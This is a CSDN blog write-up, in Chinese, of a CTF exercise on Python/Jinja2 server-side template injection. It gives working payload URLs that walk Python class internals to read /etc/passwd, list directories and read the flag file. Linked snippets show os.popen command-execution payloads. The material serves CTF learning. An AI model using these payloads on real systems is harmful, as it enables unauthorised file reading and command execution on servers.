攻防世界Web_python_template_injection

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量895 收藏
点赞数
分类专栏: ctf刷题纪 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/122828342
版权
本文详细介绍了如何利用Python SSTI(Server-Side Template Injection)模板注入漏洞,通过全局变量和类的探索,发现文件操作类并进行文件读取,最终实现系统命令执行。示例中展示了如何读取系统文件和执行系统命令,揭示了Web应用的安全风险。
摘要由CSDN通过智能技术生成
Web_python_template_injection

根据题目意思有点像python的ssti模板注入

我们来测试一下

在这里插入图片描述
在这里插入图片描述

果真存在那么我们就用ssti的基本方法了

我们先来看看全局变量

在这里插入图片描述

在这里插入图片描述

我们先来寻找一下基类

http://111.200.241.244:62377/{{''.__class__.__mro__}}

在这里发现了object类

在这里插入图片描述

寻找<type ‘object’>类的所有子类中可用的引用类

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()}}

在这里插入图片描述

这里可以看到有一个<type ‘file’>类,就是文件操作的类,我们尝试拿他的方法进行文件读取,file类的下标为40

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

在这里插入图片描述

这里发现这个类可以进行系统执行

在这里插入图片描述

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} #listdir('.')列出当前目录

在这里插入图片描述

我们通过文件读取把文件读出来

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

在这里插入图片描述

听门外雪花飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1154
好难啊
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 1984
考点为模板漏洞及其利用。
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3344
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2334
攻防世界python模板注入
攻防世界 web进阶区 Web_python_template_injection
m0_51395584的博客
06-17 1070
攻防世界 web进阶区 Web_python_template_injection python的flask模板漏洞利用,本人对这个模板也不是很熟悉,大家将就看吧。
pythonPDF_pdf_python_
09-29
在IT行业中,Python是一种广泛应用的编程语言,尤其在数据处理和自动化任务方面表现突出。本话题聚焦于使用Python处理PDF文档,特别是如何将多页的PDF文档拆分成多个单页PDF文档。PDF(Portable Document Format)是...
Python100经典练习题_python_
10-01
Python是一种高级编程语言,以其简洁明了的语法和强大的功能深受程序员喜爱。"Python100经典练习题"是学习Python编程的一个宝贵资源,旨在帮助初学者和进阶者通过实践来巩固和提升Python编程技能。这个压缩包中的...
图像处理_python_
10-03
在图像处理领域,Python是一种非常流行且强大的编程语言,它提供了丰富的库和工具,使得开发者可以轻松地实现各种复杂的图像操作。本压缩包中的资源主要针对Python环境下的图像处理,以下将详细介绍相关知识点。 1....
Logistic_Logistic_逻辑回归python_python_
10-03
Python中,我们可以使用多种库来实现逻辑回归,其中最常用的是`sklearn`库。`sklearn`全称为scikit-learn,它提供了丰富的机器学习算法,包括分类、回归、聚类等,且其API设计友好,易于理解和使用。 **实现逻辑...
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1071
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 573
有关python模板注入漏洞的学习
攻防世界】十四 --- Web_python_template_injection --- SSTI
qq_43168364的博客
12-27 424
题目 — Web_python_template_injection 考点:SSTI(服务器模板注入) 一、知识点 1. 何为模板注入 模板引擎可以让(网站)程序实现 界面 与 数据 分离,业务代码 与 逻辑代码 的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 但是模板引擎也拓宽了我们的攻击面。注入到模板中的代码可能会引发 RCE 或者 XSS 2. flask基础 (1)路由 from flask import flask @app.route('/index/'
攻防世界Web_python_template_injection
最新发布
2302_79800344的博客
04-01 951
【代码】【攻防世界Web_python_template_injection
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3672
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防世界--Web_python_template_injection
m0_67467924的博客
05-29 281
查看文件内容:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()4.构造payload查看当前目录文件,''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()1.获取基本类:''.__class__.__mro__运行成功,证明存在模板注入。
web python template injection_攻防世界WEB高手进阶之python_template_injection
weixin_39705193的博客
12-10 117
python模板注入看了一堆文章,也不是看的很明白,反而把题目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...
攻防世界-Web_python_template_injection
weixin_46784800的博客
11-18 2542
flask基础 SSTI:服务器端模板注入(Server-Side Template Injection) 不正确的使用flask中的render_template_string方法会引发SSTI。 SSTI文件读取/命令执行 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 思路:找到父类<type 'object'>–>寻找子类–>找关于命令执行或者文件操作的模块。 _class_ 返回类型所属的对象 _mro
攻防世界web_python_template_injection
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意操作,例如读取文件、执行命令等。为了防止这种漏洞,开发人员应该对输入进行严格的过滤和验证,以确保输入不包含任何恶意代码。同时,使用最新版本的Python模板引擎和Web框架也可以帮助减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值